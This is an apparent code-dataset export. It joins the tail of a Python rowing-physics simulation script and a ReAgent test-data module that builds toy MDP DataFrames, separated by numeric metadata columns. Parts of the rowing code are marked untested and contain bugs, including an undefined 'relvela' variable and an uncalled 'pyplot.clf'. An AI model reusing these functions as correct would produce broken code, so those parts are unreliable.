RIM_E1[i] = res[10]
velocity2 = zeros(aantal)
power2 = zeros(aantal)
ratios2=zeros(aantal)
energies2=zeros(aantal)
check2=zeros(aantal)
RIM_check2 = zeros(aantal)
RIM_E2 = zeros(aantal)
crew.recprofile = trianglerecovery(0.3)
for i in range(len(tempos)):
dv = 1
vend = 4
crew.tempo = tempos[i]
catchacceler = 5.0
while (dv/vend > 0.001):
res = rowingphysics.energybalance(F,crew,rigging,vend,timestep,0,
timewise=timewise,
catchacceler=catchacceler)
dv = res[0]
vend = res[1]
catchacceler = res[14]
res = rowingphysics.stroke(F,crew,rigging,vend,timestep,10,
timewise=timewise,
catchacceler=catchacceler)
velocity2[i] = res[2]
ratios2[i] = res[3]
energies2[i] = res[4]
power2[i] = res[5]
check2[i] = res[9]
RIM_check2[i] = res[11]
RIM_E2[i] = res[10]
velocity3 = zeros(aantal)
power3 = zeros(aantal)
ratios3=zeros(aantal)
energies3=zeros(aantal)
check3=zeros(aantal)
RIM_check3 = zeros(aantal)
RIM_E3 = zeros(aantal)
crew.recprofile = trianglerecovery(0.5)
for i in range(len(tempos)):
dv = 1
vend = 4
crew.tempo = tempos[i]
catchacceler = 5.0
while (dv/vend > 0.001):
res = rowingphysics.energybalance(F,crew,rigging,vend,timestep,0,
timewise=timewise,
catchacceler=catchacceler)
dv = res[0]
vend = res[1]
catchacceler = res[14]
res = rowingphysics.stroke(F,crew,rigging,vend,timestep,10,
timewise=timewise,
catchacceler=catchacceler)
velocity3[i] = res[2]
ratios3[i] = res[3]
energies3[i] = res[4]
power3[i] = res[5]
check3[i] = res[9]
RIM_check3[i] = res[11]
RIM_E3[i] = res[10]
velocity4 = zeros(aantal)
power4 = zeros(aantal)
ratios4=zeros(aantal)
energies4=zeros(aantal)
check4=zeros(aantal)
RIM_check4 = zeros(aantal)
RIM_E4 = zeros(aantal)
crew.recprofile = trianglerecovery(0.7)
for i in range(len(tempos)):
dv = 1
vend = 4
crew.tempo = tempos[i]
catchacceler = 5.0
while (dv/vend > 0.001):
res = rowingphysics.energybalance(F,crew,rigging,vend,timestep,0,
timewise=timewise,
catchacceler=catchacceler)
dv = res[0]
vend = res[1]
catchacceler = res[14]
res = rowingphysics.stroke(F,crew,rigging,vend,timestep,10,
timewise=timewise,
catchacceler=catchacceler)
velocity4[i] = res[2]
ratios4[i] = res[3]
energies4[i] = res[4]
power4[i] = res[5]
check4[i] = res[9]
RIM_check4[i] = res[11]
RIM_E4[i] = res[10]
calctime = time.time()-tm
[min1,sec1] = rowingphysics.vavgto500mtime(velocity1)
[min2,sec2] = rowingphysics.vavgto500mtime(velocity2)
[min3,sec3] = rowingphysics.vavgto500mtime(velocity3)
[min4,sec4] = rowingphysics.vavgto500mtime(velocity4)
sec1 = sec1+(min1-1)*60.
sec2 = sec2+(min2-1)*60.
sec3 = sec3+(min3-1)*60.
sec4 = sec4+(min4-1)*60.
# plotjes
try:
pyplot.clf
if (doplot==1):
pyplot.plot (power1,velocity1,'-g',label='0.1 ')
pyplot.plot (power2,velocity2,'-r',label='0.3 ')
pyplot.plot (power3,velocity3,'-b',label='0.5 ')
pyplot.plot (power4,velocity4,'-k',label='0.7 ')
pylab.legend(loc='best')
pyplot.xlabel("Power (W)")
pyplot.ylabel('Velocity (m/s)')
if (doplot==2):
pyplot.plot (tempos,velocity1,'-g',label='0.1')
pyplot.plot (tempos,velocity2,'-r',label='0.3')
pyplot.plot (tempos,velocity3,'-b',label='0.5')
pyplot.plot (tempos,velocity4,'-k',label='0.7')
pylab.legend(loc='best')
pyplot.xlabel("tempo (spm)")
pyplot.ylabel('Velocity (m/s)')
if (doplot==3):
pyplot.plot (tempos,power1,'-g',label='0.1 ')
pyplot.plot (tempos,power2,'-r',label='sinus ')
pyplot.plot (tempos,power3,'-b',label='triangle ')
pyplot.plot (tempos,power4,'-k',label='realistic ')
pylab.legend(loc='best')
pyplot.xlabel("tempo (spm)")
pyplot.ylabel('Power (W)')
if (doplot==4):
pyplot.plot (power1,sec1,'-g',label='0.1')
pyplot.plot (power2,sec2,'-r',label='0.3')
pyplot.plot (power3,sec3,'-b',label='0.5')
pyplot.plot (power4,sec4,'-k',label='0.7')
pylab.legend(loc='best')
pyplot.xlabel("Power (W)")
pyplot.ylabel('500m time')
if (doplot==5):
pyplot.plot (check1,velocity1,'-g',label='0.1')
pyplot.plot (check2,velocity2,'-r',label='0.3')
pyplot.plot (check3,velocity3,'-b',label='0.5')
pyplot.plot (check4,velocity4,'-k',label='0.7')
pylab.legend(loc='best')
pyplot.xlabel("Check (m2/s4)")
pyplot.ylabel('Velocity (m/s)')
if (doplot == 6):
pyplot.plot (RIM_check1,velocity1,'-g',label='0.1')
pyplot.plot (RIM_check2,velocity2,'-r',label='0.3')
pyplot.plot (RIM_check3,velocity3,'-b',label='0.5')
pyplot.plot (RIM_check4,velocity4,'-k',label='0.7')
pylab.legend(loc='best')
pyplot.ylabel("velocity (m/s)")
pyplot.xlabel('RIM Check (m/s)')
if (doplot == 7):
pyplot.plot (RIM_E1,velocity1,'-g',label='0.1')
pyplot.plot (RIM_E2,velocity2,'-r',label='0.3')
pyplot.plot (RIM_E3,velocity3,'-b',label='0.5')
pyplot.plot (RIM_E4,velocity4,'-k',label='0.7')
pylab.legend(loc='best')
pyplot.ylabel("velocity (m/s)")
pyplot.xlabel('RIM Stroke Efficiency (m)')
if (doplot == 8):
pyplot.plot (ratios1,velocity1,'-g',label='0.1')
pyplot.plot (ratios2,velocity2,'-r',label='0.3')
pyplot.plot (ratios3,velocity3,'-b',label='0.5')
pyplot.plot (ratios4,velocity4,'-k',label='0.7')
pylab.legend(loc='best')
pyplot.ylabel("velocity (m/s)")
pyplot.xlabel('Stroke/Recovery Ratio')
pyplot.show()
except NameError:
print("No plotting today")
return calctime
def forceseries(Forcemin,Forcemax,tempo,crew,rigging,aantal=10,timestep=.03):
tm = time.time()
crew.tempo=tempo
Forces = linspace(Forcemin,Forcemax,aantal)
velocity = zeros(aantal)
power = zeros(aantal)
ratios=zeros(aantal)
energies=zeros(aantal)
for i in range(len(Forces)):
dv = 1
vend = 4
while (dv/vend > 0.001):
res = rowingphysics.energybalance(Forces[i],crew,rigging,vend,timestep,0,timewise=timewise)
dv = res[0]
vend = res[1]
res = rowingphysics.stroke(Forces[i],crew,rigging,vend,timestep,10,timewise=timewise)
velocity[i] = res[2]
ratios[i] = res[3]
energies[i] = res[4]
power[i] = res[5]
calctime = time.time()-tm
# plotjes
try:
pyplot.clf
pyplot.subplot(221)
pyplot.plot (Forces,velocity)
pyplot.xlabel("Force (N)")
pyplot.ylabel('Velocity (m/s)')
pyplot.subplot(222)
pyplot.plot (Forces,power)
pyplot.xlabel("Force (N)")
pyplot.ylabel('Power (W)')
pyplot.subplot(223)
pyplot.plot (power,velocity)
pyplot.xlabel("Power (W)")
pyplot.ylabel('Velocity (m/s)')
pyplot.subplot(224)
pyplot.plot (Forces,ratios)
pyplot.xlabel("Force (N)")
pyplot.ylabel('Ratio')
pyplot.show()
except NameError:
print("No plotting today")
return calctime
def plot_tempo_v_constantwatt(watt,r,rg,aantal=10,
timestep=0.03,Fmin=100,
Fmax=760,tempomin=20,tempomax=40):
""" Plots average boat speed at constant power with varying spm
"""
tm = time.time()
tempoos = linspace(tempomin,tempomax,aantal)
velocity = zeros(aantal)
ratios = zeros(aantal)
watts = zeros(aantal)
fres = zeros(aantal)
effs = zeros(aantal)
for i in range(len(tempoos)):
r.tempo = tempoos[i]
res = rowingphysics.constantwatt(watt,r,rg,aantal=10,aantal2=15,timestep=timestep,Fmin=Fmin,Fmax=Fmax)
fres[i] = res[0]
velocity[i] = res[1]
ratios[i] = res[2]
watts[i] = res[3]
effs[i] = res[4]
print((tempoos[i],velocity[i],watts[i],fres[i],effs[i]))
wattratio = (watts/watts[0])**(1./3.)
velocity = velocity/wattratio
res = rowingphysics.vavgto500mtime(velocity)
mins500 = res[0]
secs500 = res[1]
secs500 = secs500+60.*(mins500-1.)
calctime = time.time()-tm
# plotjes
try:
pyplot.clf
pyplot.subplot(221)
pyplot.plot (tempoos,velocity)
pyplot.xlabel("tempo (spm)")
pyplot.ylabel('velocity (m/s)')
pyplot.subplot(222)
pyplot.plot (tempoos,effs)
pyplot.xlabel("tempo (spm)")
pyplot.ylabel('Efficiency')
pyplot.subplot(223)
pyplot.plot (tempoos,fres)
pyplot.xlabel("tempo (spm)")
pyplot.ylabel('Average Stroke Force (N)')
pyplot.subplot(224)
pyplot.plot (tempoos,ratios)
pyplot.xlabel("tempo (spm)")
pyplot.ylabel('Drive time fraction')
pyplot.show()
except NameError:
print("No plotting today")
return calctime
def plot_catchangle_v_constantwatt(watt,r,rg,aantal=10,timestep=0.03):
# not tested
tm = time.time()
catchanglemin = -1.3
catchanglemax = -0.7
catchangles = linspace(catchanglemin,catchanglemax,aantal)
velocity = zeros(aantal)
eff = zeros(aantal)
watts = zeros(aantal)
for i in range(len(catchangles)):
rg.catchangle=catchangles[i]
res = rowingphysics.constantwatt(watt,r,rg,timestep=timestep)
velocity[i] = res[1]
eff[i] = res[4]
watts[i] = res[3]
print((np.degrees(catchangles[i]),rg.dcatch,velocity[i],watts[i]))
wattratio = (watts/watts[0])**(1./3.)
velocity = velocity/wattratio
res = rowingphysics.vavgto500mtime(velocity)
mins500 = res[0]
secs500 = res[1]
secs500 = secs500+60.*(mins500-1.)
calctime = time.time()-tm
# plotjes
try:
pyplot.clf
pyplot.subplot(221)
pyplot.plot (np.degrees(catchangles),velocity)
pyplot.xlabel("catch angle (o)")
pyplot.ylabel('Velocity (m/s)')
pyplot.subplot(222)
pyplot.plot (np.degrees(catchangles),eff)
pyplot.xlabel("catch angle (o)")
pyplot.ylabel('Efficiency')
pyplot.subplot(223)
pyplot.plot (eff,velocity)
pyplot.xlabel("Efficiency")
pyplot.ylabel('Velocity (m/s)')
pyplot.subplot(224)
pyplot.plot (np.degrees(catchangles),secs500)
pyplot.xlabel("catch angle (o)")
pyplot.ylabel('500m time')
pyplot.show()
except NameError:
print("No plotting today")
return calctime
def plot_ratio_v_constantwatt(watt,r,rg,aantal=10,timestep=0.03):
# untested
tm = time.time()
lscullmin = 2.6
lscullmax = 3.3
lsculls = linspace(lscullmin,lscullmax,aantal)
velocity = zeros(aantal)
eff = zeros(aantal)
watts = zeros(aantal)
ratios = zeros(aantal)
velocity2 = zeros(aantal)
eff2 = zeros(aantal)
watts2 = zeros(aantal)
ratios2 = zeros(aantal)
velocity3 = zeros(aantal)
eff3 = zeros(aantal)
watts3 = zeros(aantal)
ratios3 = zeros(aantal)
r.tempo = 25.
watt = 280.
for i in range(len(lsculls)):
rg.lscull=lsculls[i]
res = rowingphysics.constantwatt(watt,r,rg,timestep=timestep)
velocity[i] = res[1]
ratios[i] = res[2]
eff[i] = res[4]
watts[i] = res[3]
print((r.tempo, lsculls[i],ratios[i],velocity[i],watts[i]))
wattratio = (watts/watts[0])**(1./3.)
velocity = velocity/wattratio
relvel = velocity/max(velocity)
r.tempo = 30.
watt = 320.
for i in range(len(lsculls)):
rg.lscull=lsculls[i]
res = rowingphysics.constantwatt(watt,r,rg,timestep=timestep)
velocity2[i] = res[1]
ratios2[i] = res[2]
eff2[i] = res[4]
watts2[i] = res[3]
print((r.tempo, lsculls[i],ratios2[i],velocity2[i],watts2[i]))
wattratio = (watts2/watts2[0])**(1./3.)
velocity2 = velocity2/wattratio
relvelb = velocity2/max(velocity2)
r.tempo = 35.
watt = 450.
for i in range(len(lsculls)):
rg.lscull=lsculls[i]
res = rowingphysics.constantwatt(watt,r,rg,timestep=timestep)
velocity3[i] = res[1]
ratios3[i] = res[2]
eff3[i] = res[4]
watts3[i] = res[3]
print((r.tempo, lsculls[i],ratios3[i],velocity3[i],watts3[i]))
wattratio = (watts3/watts3[0])**(1./3.)
velocity3 = velocity3/wattratio
relvelb = velocity3/max(velocity3)
results = vstack((lsculls,velocity,eff,watts,ratios))
savetxt('v_ratio_T25.txt',results)
results2 = vstack((lsculls,velocity2,eff2,watts2,ratios2))
savetxt('v_ratio_T30.txt',results2)
results3 = vstack((lsculls,velocity3,eff3,watts3,ratios3))
savetxt('v_ratio_T35.txt',results3)
calctime = time.time()-tm
# plotjes
try:
pyplot.clf
pyplot.subplot(221)
pyplot.plot (lsculls,velocity,'-g',label='280 W, T=25')
pyplot.plot (lsculls,velocity2,'-r',label='320 W, T=30')
pyplot.plot (lsculls,velocity3,'-b',label='450 W, T=35')
pylab.legend(loc='best')
pyplot.xlabel("L scull (m)")
pyplot.ylabel('Velocity (m/s)')
pyplot.subplot(222)
pyplot.plot (ratios,velocity,'-g',label='280 W, T=25')
pyplot.plot (ratios2,velocity2,'-r',label='320 W, T=30')
pyplot.plot (ratios3,velocity3,'-b',label='450 W, T=35')
pylab.legend(loc='best')
pyplot.xlabel("Ratio")
pyplot.ylabel('Velocity (m/s)')
pyplot.subplot(223)
pyplot.plot (lsculls,relvel,'-g',label='280 W, T=25')
pyplot.plot (lsculls,relvela,'-r',label='320 W, T=30')
pyplot.plot (lsculls,relvelb,'-b',label='450 W, T=35')
pylab.legend(loc='best')
pyplot.xlabel("L scull (m)")
pyplot.ylabel('Relative velocity')
pyplot.subplot(224)
pyplot.plot (ratios,relvel,'-g',label='280 W, T=25')
pyplot.plot (ratios2,relvela,'-r',label='320 W, T=30')
pyplot.plot (ratios3,relvelb,'-b',label='450 W, T=35')
pylab.legend(loc='best')
pyplot.xlabel("Ratio")
pyplot.ylabel('Relative velocity')
pyplot.show()
except NameError:
print("No plotting today")
return calctime
def plot_tempo_power_constantv(velo,r,rg,aantal=10,timestep=0.03,
Fmin=50,Fmax=650):
""" Plots power needed to achieve certain boat speed at various stroke rates
"""
tm = time.time()
tempomin = 24
tempomax = 33
tempoos = linspace(tempomin,tempomax,aantal)
velocity = zeros(aantal)
ratios = zeros(aantal)
watts = zeros(aantal)
peakforce = zeros(aantal)
eff = zeros(aantal)
for i in range(len(tempoos)):
r.tempo = tempoos[i]
res = rowingphysics.constantvelo(velo,r,rg,timestep=timestep,Fmin=Fmin,Fmax=Fmax)
velocity[i] = res[1]
ratios[i] = res[2]
watts[i] = res[3]
eff[i]=res[4]
peakforce[i] = res[0]
print((tempoos[i],velocity[i],watts[i],peakforce[i]))
calctime = time.time()-tm
watts = watts*(velocity/velocity[0])**3
# plotjes
try:
pyplot.clf
pyplot.subplot(221)
pyplot.plot (tempoos,watts)
pyplot.xlabel("tempo (spm)")
pyplot.ylabel('Power (W)')
pyplot.subplot(222)
pyplot.plot (tempoos,eff)
pyplot.xlabel("tempo (spm)")
pyplot.ylabel('Efficiency')
pyplot.subplot(223)
pyplot.plot (tempoos,peakforce)
pyplot.xlabel("tempo (spm)")
pyplot.ylabel('Average Stroke Force (N)')
pyplot.subplot(224)
pyplot.plot (tempoos,ratios)
pyplot.xlabel("tempo (spm)")
pyplot.ylabel('Drive time fraction')
pyplot.show()
except NameError:
print("No plotting today")
return calctime
def plot_inboard_power_constantv(velo,r,rg,aantal=10,timestep=0.03):
""" Plots power at given boat speed for various values of inboard
"""
tm = time.time()
linmin = 86.0
linmax = 92.
lins = linspace(linmin,linmax,aantal)
velocity = zeros(aantal)
ratios = zeros(aantal)
watts = zeros(aantal)
peakforce = zeros(aantal)
eff = zeros(aantal)
for i in range(len(lins)):
rg.lin = lins[i]/100.
res = rowingphysics.constantvelo(velo,r,rg,timestep=timestep)
velocity[i] = res[1]
ratios[i] = res[2]
watts[i] = res[3]
eff[i]=res[4]
peakforce[i] = (0.5+0.25*pi)*res[0]
print((lins[i],velocity[i],watts[i],peakforce[i]))
calctime = time.time()-tm
# plotjes
try:
pyplot.clf
# pyplot.subplot(221)
pyplot.plot (lins,watts)
pyplot.xlabel("Inboard (cm)")
pyplot.ylabel('Power (W)')
# pyplot.subplot(222)
# pyplot.plot (lins,eff)
# pyplot.xlabel("Inboard (cm)")
# pyplot.ylabel('Efficiency')
# pyplot.subplot(223)
# pyplot.plot (lins,peakforce)
# pyplot.xlabel("Inboard (cm)")
# pyplot.ylabel('Average Stroke Force (N)')
pyplot.show()
except NameError:
print("No plotting today")
return calctime
def plot_boatweight_power_constantv(velo,r,rg,aantal=10,timestep=0.01):
tm = time.time()
mborg = rg.mb
mbmin = 14.0
mbmax = 40.0
mbs = linspace(mbmin,mbmax,aantal)
velocity = zeros(aantal)
ratios = zeros(aantal)
watts = zeros(aantal)
peakforce = zeros(aantal)
eff = zeros(aantal)
for i in range(len(mbs)):
rg.mb = mbs[i]
res = rowingphysics.constantvelo(velo,r,rg,timestep=timestep,aantal2=10,Fmin=100,Fmax=700)
velocity[i] = res[1]
ratios[i] = res[2]
watts[i] = res[3]
eff[i]=res[4]
peakforce[i] = (0.5+0.25*pi)*res[0]
print((mbs[i],velocity[i],watts[i],peakforce[i]))
calctime = time.time()-tm
rg.mb = mborg
# plotjes
try:
pyplot.clf
pyplot.subplot(221)
pyplot.plot (mbs,watts)
pyplot.xlabel("Boat Weight (kg)")
pyplot.ylabel('Power (W)')
pyplot.subplot(222)
pyplot.plot (mbs,eff)
pyplot.xlabel("Boat Weight (kg)")
pyplot.ylabel('Efficiency')
pyplot.subplot(223)
pyplot.plot (mbs,peakforce)
pyplot.xlabel("Boat Weight (kg)")
pyplot.ylabel('Average Stroke Force (N)')
pyplot.show()
except NameError:
print("No plotting today")
return calctime
def atkinson(timestep=0.01,factor=0.45,doplot=1,h1=0.75,h2=1.0,
timewise=0,x1=0.02,x2=0.39,bladearea=0.071,
lscull=3.05,lin=0.86,strokelength=1.31,constantdrag=0):
from .crew import trapezium
from .crew import trianglerecovery,sinusrecovery,flatrecovery
r = crew(mc=90.0,tempo=29.4,strokelength=strokelength)
r.strokeprofile = trapezium(x1=x1,x2=x2,h1=h1,h2=h2)
ratio = r.strokeprofile.ratio
rg = rigging(mb=14.,catchangle=-1.18,lin=lin,
bladearea=bladearea,lscull=lscull)
factor2 = (rg.lscull-rg.lin)/rg.lin
# print(factor2
F = ratio*368.*factor*factor2
aantal=100
x = linspace(0,r.strokelength,aantal)
y1 = zeros(aantal)
for i in range(len(x)):
y1[i] = r.forceprofile(F,x[i])
# op snelheid komen
dv = 1.0
vend = 4.0
tm = time.time()
while (dv/vend > 0.001):
res = rowingphysics.atkinsoncalc(F,r,rg,vend,timestep,0,timewise=timewise,constantdrag=constantdrag)
dv = res[0]
vend = res[1]
res = rowingphysics.stroke_atkinson(F,r,rg,vend,timestep,10,timewise=timewise,constantdrag=constantdrag)
velocity = res[2]
ratios = res[3]
energies = res[4]
power = res[5]
res2 = rowingphysics.atkinsoncalc(F,r,rg,vend,timestep,doplot=doplot,doprint=1,
timewise=timewise,constantdrag=constantdrag)
velocity2 = res2[2]
ratios2 = res2[3]
energies2 = res2[4]
power2 = res2[5]
displacement = rg.mb+rg.Nrowers*r.mc
res = rowingphysics.drag_eq(displacement,velocity,alfaref=3.2,doprint=1,constantdrag=constantdrag)
print(("Velocity :",velocity," m/s"))
print(("Ratio :",ratios))
print(("Power :",power," W"))
print(("Energy :",energies," J"))
print(("dv :",res2[0]))
print(("vend :",res2[1]))
print(("vmin :",res2[7]))
print(("vmax :",res2[8]))
calctime = time.time()-tm
return calctime
def james_hm2min(timestep=0.01,factor=0.86,doplot=1,h1=1.0,h2=0.8,
timewise=0,x1=0.03,x2=0.35,bladearea=1.212e-1):
from .crew import trapezium
from .crew import trianglerecovery,sinusrecovery,flatrecovery
r = crew(mc=88.5,tempo=36.0,strokelength=1.37)
r.strokeprofile = trapezium(x1=x1,x2=x2,h1=h1,h2=h2)
ratio = r.strokeprofile.ratio
rg = rigging(Nrowers=2,mb=27.,roworscull='row',catchangle=-1.18,lin=1.16,
bladearea=bladearea,bladelength=0.55,spread=0.86,lscull=3.76)
factor2 = rg.lscull/(rg.lscull-rg.lin)
F = ratio*368.*factor*factor2
aantal=100
x = linspace(0,r.strokelength,aantal)
y1 = zeros(aantal)
for i in range(len(x)):
y1[i] = r.forceprofile(F,x[i])
# op snelheid komen
dv = 1.0
vend = 4.0
tm = time.time()
while (dv/vend > 0.001):
res = rowingphysics.atkinsoncalc(F,r,rg,vend,timestep,0,timewise=timewise)
dv = res[0]
vend = res[1]
res = rowingphysics.stroke_atkinson(F,r,rg,vend,timestep,10,timewise=timewise)
velocity = res[2]
ratios = res[3]
energies = res[4]
power = res[5]
res2 = rowingphysics.atkinsoncalc(F,r,rg,vend,timestep,doplot=doplot,doprint=1,
timewise=timewise)
velocity2 = res2[2]
ratios2 = res2[3]
energies2 = res2[4]
power2 = res2[5]
print(("Velocity :",velocity," m/s"))
print(("Ratio :",ratios))
print(("Power :",power," W"))
print(("Energy :",energies," J"))
print(("dv :",res[0]))
calctime = time.time()-tm
return calctime
def powerseries(powers,r,rg):
""" Prints boat splits at power values in powers
Example: powerseries([200,250,300],r,rg)
"""
for pw in powers:
res = rowingphysics.constantwatt(pw,r,rg)
[mins,secs] = rowingphysics.vavgto500mtime(res[1])
print((pw,'W ',mins,':',secs))
def ergtoboat(splits,r,rg,tempos,erg):
ratio = 0.5
for tempo in tempos:
r.tempo = tempo
print("----------------------------------------")
print(("Tempo ",tempo, " /min"))
print("")
print("erg split erg P total P boat split")
for split in splits:
mins = split[0]
secs = split[1]
res = rowingphysics.ergtopower(mins,secs,ratio,r,erg)
totalpower = res[0]
ergpower = res[1]
res = rowingphysics.constantwatt(totalpower,r,rg)
[bmins,bsecs] = rowingphysics.vavgto500mtime(res[1])
bmins = int(bmins)
bsecs = int(10*bsecs)/10.
print((mins,":",secs," ",int(ergpower)," ",int(totalpower)," ",bmins,":",bsecs))
def tempopower(r,rg,tp,pw):
res = rowingphysics.constantwatt(pw,r,rg,timestep = 0.01,aantal = 15,aantal2=15)
print((pw,res[3]))
print(('Split ',rowingphysics.vavgto500mtime(res[1])))
def tempopowererg(r,rg,erg,tp,pwd,theconst=0.0):
res = rowingphysics.constantwatt_ergdisplay(pwd,r,erg,timestep=0.01,aantal=10,aantal2=10,theconst=theconst)
print(res)
pw = res[3]
res = rowingphysics.constantwatt(pw,r,rg,timestep = 0.01,aantal = 15,aantal2=15)
print((pw,res[3]))
print(('Split ',rowingphysics.vavgto500mtime(res[1])))
| 29.153015
| 111
| 0.576758
| 10,364
| 83,640
| 4.632188
| 0.046218
| 0.061865
| 0.019997
| 0.030662
| 0.873334
| 0.864585
| 0.830695
| 0.804637
| 0.791014
| 0.774871
| 0
| 0.054513
| 0.272716
| 83,640
| 2,868
| 112
| 29.16318
| 0.734703
| 0.02023
| 0
| 0.811131
| 0
| 0
| 0.057868
| 0.000893
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014142
| false
| 0
| 0.011405
| 0
| 0.036496
| 0.025547
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
13e633aed889584422d52608f5581e1e00c11c65
| 5,595
|
py
|
Python
|
reagent/test/workflow/test_data/ex_mdps.py
|
JiayingClaireWu/ReAgent
|
3f2365c5bab396b3e965f77cd8d4f0ac15ae2f7b
|
[
"BSD-3-Clause"
] | null | null | null |
reagent/test/workflow/test_data/ex_mdps.py
|
JiayingClaireWu/ReAgent
|
3f2365c5bab396b3e965f77cd8d4f0ac15ae2f7b
|
[
"BSD-3-Clause"
] | null | null | null |
reagent/test/workflow/test_data/ex_mdps.py
|
JiayingClaireWu/ReAgent
|
3f2365c5bab396b3e965f77cd8d4f0ac15ae2f7b
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All rights reserved.
from typing import Tuple
import pandas
def generate_discrete_mdp_pandas_df(
multi_steps: bool,
use_seq_num_diff_as_time_diff: bool
# pyre-fixme[11]: Annotation `DataFrame` is not defined as a type.
) -> Tuple[pandas.DataFrame, str]:
# Simulate the following MDP:
# state: 0, action: 7 ('L'), reward: 0,
# state: 1, action: 8 ('R'), reward: 1,
# state: 4, action: 9 ('U'), reward: 4,
# state: 5, action: 10 ('D'), reward: 5,
# state: 6 (terminal)
actions = ["L", "R", "U", "D"]
possible_actions = [["L", "R"], ["R", "U"], ["U", "D"], ["D"]]
# assume multi_steps=2
if multi_steps:
rewards = [[0, 1], [1, 4], [4, 5], [5]]
metrics = [
[{"reward": 0}, {"reward": 1}],
[{"reward": 1}, {"reward": 4}],
[{"reward": 4}, {"reward": 5}],
[{"reward": 5}],
]
next_states = [[{1: 1}, {4: 1}], [{4: 1}, {5: 1}], [{5: 1}, {6: 1}], [{6: 1}]]
next_actions = [["R", "U"], ["U", "D"], ["D", ""], [""]]
possible_next_actions = [
[["R", "U"], ["U", "D"]],
[["U", "D"], ["D"]],
[["D"], [""]],
[[""]],
]
# terminals = [[0, 0], [0, 0], [0, 1], [1]]
time_diffs = [[1, 1], [1, 1], [1, 1], [1]]
else:
rewards = [0, 1, 4, 5]
metrics = [{"reward": 0}, {"reward": 1}, {"reward": 4}, {"reward": 5}] # noqa
next_states = [{1: 1}, {4: 1}, {5: 1}, {6: 1}]
next_actions = ["R", "U", "D", ""]
possible_next_actions = [["R", "U"], ["U", "D"], ["D"], [""]]
# terminals = [0, 0, 0, 1]
if use_seq_num_diff_as_time_diff:
time_diffs = [1, 1, 1, 1] # noqa
else:
time_diffs = [1, 3, 1, 1] # noqa
n = 4
mdp_ids = ["0", "0", "0", "0"]
sequence_numbers = [0, 1, 4, 5]
sequence_number_ordinals = [1, 2, 3, 4]
states = [{0: 1}, {1: 1}, {4: 1}, {5: 1}]
action_probabilities = [0.3, 0.4, 0.5, 0.6]
ds = "2019-07-17"
# pyre-fixme[16]: Module `pandas` has no attribute `DataFrame`.
df = pandas.DataFrame(
{
"mdp_id": mdp_ids,
"sequence_number": sequence_numbers,
"sequence_number_ordinal": sequence_number_ordinals,
"state_features": states,
"action": actions,
"action_probability": action_probabilities,
"reward": rewards,
"next_state_features": next_states,
"next_action": next_actions,
"time_diff": time_diffs,
"possible_actions": possible_actions,
"possible_next_actions": possible_next_actions,
"metrics": metrics,
"ds": [ds] * n,
}
)
return df, ds
def generate_parametric_mdp_pandas_df(
multi_steps: bool, use_seq_num_diff_as_time_diff: bool
):
# Simulate the following MDP:
# state: 0, action: 7 ('L'), reward: 0,
# state: 1, action: 8 ('R'), reward: 1,
# state: 4, action: 9 ('U'), reward: 4,
# state: 5, action: 10 ('D'), reward: 5,
# state: 6 (terminal)
actions = [{7: 1}, {8: 1}, {9: 1}, {10: 1}]
possible_actions = [
[{7: 1}, {8: 1}],
[{8: 1}, {9: 1}],
[{9: 1}, {10: 1}],
[{10: 1}],
]
# assume multi_step=2
if multi_steps:
rewards = [[0, 1], [1, 4], [4, 5], [5]]
metrics = [
[{"reward": 0}, {"reward": 1}],
[{"reward": 1}, {"reward": 4}],
[{"reward": 4}, {"reward": 5}],
[{"reward": 5}],
]
next_states = [[{1: 1}, {4: 1}], [{4: 1}, {5: 1}], [{5: 1}, {6: 1}], [{6: 1}]]
next_actions = [[{8: 1}, {9: 1}], [{9: 1}, {10: 1}], [{10: 1}, {}], [{}]]
possible_next_actions = [
[[{8: 1}, {9: 1}], [{9: 1}, {10: 1}]],
[[{9: 1}, {10: 1}], [{10: 1}]],
[[{10: 1}], [{}]],
[[{}]],
]
# terminals = [[0, 0], [0, 0], [0, 1], [1]]
time_diffs = [[1, 1], [1, 1], [1, 1], [1]]
else:
rewards = [0, 1, 4, 5]
metrics = [{"reward": 0}, {"reward": 1}, {"reward": 4}, {"reward": 5}] # noqa
next_states = [{1: 1}, {4: 1}, {5: 1}, {6: 1}]
next_actions = [{8: 1}, {9: 1}, {10: 1}, {}]
possible_next_actions = [[{8: 1}, {9: 1}], [{9: 1}, {10: 1}], [{10: 1}], [{}]]
# terminals = [0, 0, 0, 1]
if use_seq_num_diff_as_time_diff:
time_diffs = [1, 1, 1, 1] # noqa
else:
time_diffs = [1, 3, 1, 1] # noqa
n = 4
mdp_ids = ["0", "0", "0", "0"]
sequence_numbers = [0, 1, 4, 5]
sequence_number_ordinals = [1, 2, 3, 4]
states = [{0: 1}, {1: 1}, {4: 1}, {5: 1}]
action_probabilities = [0.3, 0.4, 0.5, 0.6]
ds = "2019-07-17"
# pyre-fixme[16]: Module `pandas` has no attribute `DataFrame`.
df = pandas.DataFrame(
{
"mdp_id": mdp_ids,
"sequence_number": sequence_numbers,
"sequence_number_ordinal": sequence_number_ordinals,
"state_features": states,
"action": actions,
"action_probability": action_probabilities,
"reward": rewards,
"next_state_features": next_states,
"next_action": next_actions,
"time_diff": time_diffs,
"possible_actions": possible_actions,
"possible_next_actions": possible_next_actions,
"metrics": metrics,
"ds": [ds] * n,
}
)
return df, ds
| 34.96875
| 86
| 0.456479
| 719
| 5,595
| 3.385257
| 0.140473
| 0.026294
| 0.019721
| 0.016434
| 0.889482
| 0.882087
| 0.881265
| 0.870583
| 0.850863
| 0.846754
| 0
| 0.086394
| 0.323503
| 5,595
| 159
| 87
| 35.188679
| 0.556671
| 0.158534
| 0
| 0.66129
| 1
| 0
| 0.114982
| 0.018807
| 0
| 0
| 0
| 0.006289
| 0
| 1
| 0.016129
| false
| 0
| 0.016129
| 0
| 0.048387
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
